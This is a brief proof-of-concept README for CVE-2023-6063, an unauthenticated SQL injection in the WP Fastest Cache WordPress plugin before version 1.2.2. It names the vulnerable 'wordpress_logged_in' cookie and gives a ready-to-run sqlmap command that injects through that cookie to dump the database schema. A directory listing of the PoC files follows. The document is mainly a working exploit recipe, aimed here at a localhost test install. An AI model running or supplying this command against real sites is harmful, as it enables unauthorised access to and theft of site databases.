CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)# CVE-2023-6063 PoC
## Reference
- [Unauthenticated SQL Injection Vulnerability Addressed in WP Fastest Cache 1.2.2 | WPScan](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
## Plugin setting
Enable "WP Fastest Cache".

## PoC
The "wordpress_logged_in" cookie parameter is vulnerable.
```
$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema
```

[4.0K] /data/pocs/c1959f306e7f1d09015b2c9a801b8c425be4fa30
├── [263K] image_1.png
├── [157K] image_2.png
└── [ 528] README.md
0 directories, 3 files